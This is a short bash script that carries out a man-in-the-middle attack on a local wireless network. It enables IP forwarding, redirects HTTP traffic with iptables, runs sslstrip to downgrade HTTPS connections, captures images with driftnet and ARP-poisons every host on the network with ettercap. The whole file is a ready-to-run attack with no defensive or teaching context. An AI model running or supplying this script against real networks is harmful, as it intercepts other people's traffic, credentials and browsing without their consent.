#!/bin/bash
# MiTM with Driftnet and Ettercap on local network
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080 & xterm -e driftnet -i wlan0 -b & xterm -e ettercap -Tqi wlan0 -M arp:remote // //
